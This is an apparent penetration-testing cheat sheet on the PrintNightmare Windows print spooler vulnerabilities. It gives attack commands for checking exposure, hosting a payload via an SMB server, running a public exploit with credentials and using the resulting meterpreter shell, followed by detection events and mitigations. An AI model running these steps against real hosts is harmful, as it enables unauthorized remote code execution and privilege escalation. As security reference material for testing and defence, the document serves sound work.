killchain-compendium/exploit/windows/print_nightmare/print_nightmare.md

48 lines
1.5 KiB
Markdown

# Print Nightmare
* Privilege Escalation using Print Spooler Service
* Located at `C:\Windows\System32\spoolsv.exe`
* Enabled by default
* [CVE-2021-1675](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675) (locally exploitable) and [CVE-2021-34527](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) (RCE) are both related to the print spooler
* RCE connection is done via [DCE/RPC](https://wiki.wireshark.org/DCE/RPC). Use of `RpcAddPrinterDriver` or `RpcAddPrinterDriverEx`
## Usage
* Prepare reverse shell
* Check if target would be vulnerable
```sh
rpcdump.py @$TARGET_IP | grep -e 'MS-RPRN|MS-PAR'
```
* Execute smb server
```sh
smbserver.py share . -smb2support
```
* Execute PoC with credentials to elevate
```sh
python CVE-2021-1675.py <domain of domaincontroller>/<user>:<password>@$TARGET_IP
```
* Use the meterpreter session
## IOCs
* `pcAddPrinterDriverEx()` is called
* [Sygnia](https://www.sygnia.co/demystifying-the-printnightmare-vulnerability) explains them
* [Splunk queries](https://www.splunk.com/en_us/blog/security/i-pity-the-spool-detecting-printnightmare-cve-2021-34527.html)
* Logs are `Microsoft-Windows-PrintService/Admin` and `Microsoft-Windows-PrintService/Operational`
* Event Ids `316, 808, 811, 31017, 7031`
## Mitigation
* [link](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527)
* Stop and disable
```sh
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
```
* Disable group policy
```sh
Computer Configuration/Administrative Templates/Printers
```